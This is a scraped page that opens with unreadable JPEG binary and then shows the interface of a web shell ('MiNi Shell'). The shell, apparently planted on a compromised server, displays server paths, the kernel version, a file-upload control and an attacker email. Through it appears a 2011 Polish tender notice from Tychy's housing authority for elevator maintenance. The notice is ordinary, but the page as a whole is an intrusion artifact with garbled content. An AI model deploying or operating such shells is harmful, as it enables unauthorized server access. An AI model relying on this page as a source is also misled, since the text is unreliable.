JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110608/160419-N-2011.html

<p class="kh_header"><b>Tychy: Usługi w zakresie napraw i konserwacji dźwigów w budynkach administrowanych na rzez Miejski Zarząd Budynków Mieszkalnych w Tychach</b><br>
<b>Numer ogłoszenia: 160419 - 2011; data zamieszczenia: 08.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie napraw i konserwacji dźwigów w budynkach administrowanych na rzez Miejski Zarząd Budynków Mieszkalnych w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest realizacja usługi w zakresie bieżącej konserwacji źwigów, usuwania awarii wraz ze świadczeniem czynności pogotowia technicznego oraz wykonywanie napraw wykraczających poza czynności konserwacyjne urządzeń dźwigowych znajdujących się w nieruchomościach Miasta Tychy i Wspólnot Mieszkaniowych, Lokalowych, którymi w imieniu Zamawiającego administrują komórki organizacyjne MZBM w Tychach, zwane dalej ROM - ami , a to: 
        ROM II   z siedzibą w Tychach przy ul. Budowlanych 41  
        ROM III  z siedzibą w Tychach przy ul. Cyganerii 43 		
        ROM IV z siedzibą w Tychach przy Al. Niepodległości 76 	
        ROM V  z siedzibą w Tychach przy ul. Budowlanych 41 		 

2.    Zamówienie składa się z dwóch części zwanych, dalej zadaniami:        ZADANIE Nr 1  - naprawa i konserwacja  dźwigów w budynkach administrowanych przez  ROM Nr  II - V w Tychach

ZADANIE Nr 2  - naprawa i konserwacja dźwigów w budynku użyteczności publicznej BALBINA CENTRUM , położonym w Tychach przy ul. Barona 30,
administrowanym przez ROM Nr II.

3.   Wykaz nieruchomości wyposażonych w urządzenia dźwigowe wraz z charakterystyką dźwigów zawiera załącznik nr 1 dla Zadania nr 1 i załącznik nr 1 dla Zadania nr 2.

4.   Informację o stanie technicznym dźwigów dla Zadania nr 1 i 2 - zawiera załącznik nr 2.
         
5.   Zakres bieżącej konserwacji dla Zadania Nr 1 i Nr 2 obejmuje m.in.:
  1)	Przestrzeganie warunków wynikających z zakresu przeglądów P1 i P2, a w szczególności dbanie o:    
   a) 	należyty stan techniczny wszelkich mechanizmów napędowych;
   b) 	należyte działanie urządzeń i układów sterowych;
   c) 	należyte działanie urządzeń bezpieczeństwa, drzwi przystankowych 
             i drzwi kabinowych;
   d) 	należyte działanie urządzeń chwytających, stanu cięgien i lin 
             nośnych, ich zamocowań i elementów zawieszenia;
   e) 	należyte działanie wskaźników sygnalizacji i oświetlenia w kabinie 
             dźwigu; 
   f) 	smarowanie wszystkich elementów wymagających smarowania;
   g) 	utrzymanie w czystości maszynowni, podszybia i dachu kabiny; 
   h) 	wykonywanie wszelkich niezbędnych pomiarów elektrycznych;
   i)        wykonywanie i przestrzeganie zaleceń i nakazów wydanych przez 
             właściwy organ Dozoru Technicznego;
   j)        sprawdzanie urządzeń pod kątem jakości pracy;
   k)       kontrola stanu oleju napędu;
                                  
 2)  Ponadto Wykonawca zobowiązany jest:
 a) 	przestrzegać instrukcji konserwacji, usuwać na bieżąco usterki i inne nieprawidłowości w działaniu urządzenia oraz dokonywać przeglądów w terminach określonych w instrukcji eksploatacji;
 b)  	prowadzić dziennik konserwacji dźwigu poprzez dokonywanie zapisów wszelkich wykonywanych czynności w terminach dokonanych konserwacji oraz przygotowywania dźwigów i brania czynnego udziału w czasie przeprowadzania badań zwyczajnych i nadzwyczajnych określonych przez dozór techniczny;
c)  	zwracać uwagę i reagować na nieprawidłowości użytkowania urządzenia dźwigowego;
d)  	powiadamiać Kierowników poszczególnych Rejonów Obsługi Mieszkańców (ROM-ów) o stwierdzonych przypadkach dewastacji, kradzieży lub wadliwej pracy dźwigu zwłaszcza wtedy, gdy może to mieć wpływ na bezpieczeństwo eksploatacji urządzenia;
e)  	reprezentować Zamawiającego podczas kontroli przeprowadzonych przez Urząd Dozoru Technicznego zwany dalej UDT, służby p. poż. itd.;
f)  	przestrzegać terminów badań kontrolnych i konserwacyjnych dźwigu;
g)	wyprzedzająco informować kierowników poszczególnych ROM-ów o konieczności wykonania czynności zmierzających do bezawaryjnej pracy urządzenia;
h)   zorganizować punkt pogotowia technicznego na terenie Miasta Tychy;

3) 	Awarie: 
    	Usuwanie awarii wraz ze świadczeniem pogotowia technicznego polegać będzie na usuwaniu w sposób niezwłoczny zgłaszanych awarii. Nadto Wykonawca zobowiązany jest przyjmować zgłoszenia mieszkańców/użytkowników nieruchomości, w zakresie objętym      przedmiotem zamówienia, reagować na zgłoszenie awarii do 2-ch godzin od momentu przyjęcia zgłoszenia i usuwać awarie lub powiadomić kierownika danego ROM-u o konieczności wykonania naprawy wykraczającej poza zakres konserwacji, w terminie nie  dłuższym niż 2,5 godziny od chwili otrzymania telefonicznego zgłoszenia.

4) 	Naprawy:
     	Naprawy to roboty wykraczające poza zakres bieżącej konserwacji.
     	Konieczność wykonania czynności naprawczych dźwigu Wykonawca zgłosi do Kierownika danego ROM-u i przedstawi kalkulację. 
     	Przedstawiciel Rom-u wystawi zlecenie na naprawę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1. pkt. 6) ustawy - PZP, w wysokości max. do 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> -  dla Zadania nr 1:   4 500,00 zł   (słownie:  cztery tysiące pięćset złotych)
-  dla Zadania nr 2:      700,00 zł   (słownie:  siedemset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, określonego w art. 22 ust.1 pkt.1 ustawy -PZP., Zamawiający wymaga, aby Wykonawca wykazał, że posiada uprawnienia Urzędu Dozoru Technicznego do modernizacji dźwigów.  
(W przypadku podmiotów występujących wspólnie warunek ten, Zamawiający uzna za spełniony, jeżeli Wykonawcy składający ofertę wspólną na wybrane Zadanie (a) będą spełniać go łącznie lub co najmniej jeden z Wykonawców)   
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP),  Zamawiający wymaga złożenia następujących dokumentów: 
-    wykazu wykonanych , a w przypadku świadczeń okresowych lub ciągłych 
     również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , z podaniem ich wartości, przedmiotu , dat wykonania i odbiorców , w którym  należy wykazać:

a)   dla  ZADANIA Nr 1 -  co najmniej dwie usługi wykonane / wykonywane z należytą 
starannością (w ramach dwóch odrębnych umów) ,obejmujące swym zakresem m.in.: 
naprawę i konserwację dźwigów o wartości każdej z tych usług nie mniejszej niż:  89 000,00 zł (brutto)  - każda z usług 

b)   dla  ZADANIA Nr 2 -  co najmniej dwie usługi wykonane / wykonywane z należytą starannością (w ramach dwóch odrębnych umów) ,obejmujące swym zakresem m.in.:  naprawę i konserwację dźwigów o wartości każdej z tych usług nie mniejszej niż: 15 000,00 zł (brutto)   - każda z usług 

Do wykazu usług na wybrane zadanie (-a) należy dołączyć dokumenty potwierdzające, że usługi wskazane w wykazie zostały wykonane lub są wykonywane z należytą starannością.

Wykazy usług należy sporządzić odrębnie na każde wybrane zadanie (- a)  wg wzoru druku stanowiącego załącznik Nr 5 do SIWZ  - dla Zadania nr 1
i Zadania nr 2

(W przypadku podmiotów występujących wspólnie warunki udziału określone jw. na wybrane zadanie (-a)  Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców).  
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) Zamawiający wymaga aby Wykonawca wykazał , że dysponuje osobami  zdolnymi do wykonania zamówienia, a w szczególności:

a)	co najmniej jedną osobą, posiadającą uprawnienia do prowadzenia konserwacji, eksploatacji: dźwigów, dźwignic, wyciągarek, wyciągów itp.   

b)	co najmniej dwiema osobami posiadającymi uprawnienia do wykonania pracy na stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu 1 kV 

Na potwierdzenie niniejszego warunku Zamawiający wymaga złożenia następujących dokumentów:  
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.
  (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców). 
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  Wykonawca spełnia warunek udziału dotyczący posiadania wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), Zamawiający wymaga, złożenia następujących dokumentów: 

opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia nie mniejszej niż 
1)    170 000,00 zł   -  dla ZADANIA Nr 1
2)     30 000,00 zł   -  dla ZADANIA Nr 2
Do oferty należy dołączyć potwierdzenie opłacenia polisy  l u b  fakt jej opłacenia musi wynikać z treści dokumentu.
Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty dokumentu Wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
Kwotę ubezpieczenia wyrażoną w innej walucie niż PLN, Zamawiający przeliczy na PLN, przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.  
    
(W przypadku podmiotów występujących wspólnie ww. warunki Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców). 
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy oraz oferty cenowej dla wybranego zadania
2) pełnomocnictwo wskazujące, że osoba występująca w imieniu wykonawcy jest upoważniona, jeżeli 
     wynika to z załączonych dokumentów,
3) dowód wniesienia wadium
4) Zgodnie z art. 26 ust. 2b ustawy - PZP, Wykonawca może polegać na wiedzy i doświadczeniu potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Stawka roboczogodziny kosztorysowej R-g z narzutami(R+Kp.+ Zysk) - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
2)  zmian personalnych, adresowych, formy prawnej stron umowy.
3) zmiany ilości nieruchomości w stosunku do wyszczególnionej w Załączniku Nr 1 do wzoru umowy (np. poprzez 
         przekazanie administrowanej nieruchomości, itp.) zmianie ulegnie wysokość miesięcznego 
         ryczałtowego wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny (pokój nr 20) 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2011 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa i konserwacja  dźwigów w budynkach administrowanych 
przez  ROM Nr  II - V w Tychach.
Szczególowy zakres zamówienia został określony w rozdzie II pkt. 5 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej R-g z narzutami(R+Kp.+Zysk) - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa i konserwacja dźwigów w budynku użyteczności publicznej BALBINA CENTRUM ,położonym w Tychach przy ul. Barona 30

Szczególowy zakres zamówienia został określony w rozdzie II pkt. 5 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej R-g z narzutami(R+Kp.+Zysk) - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com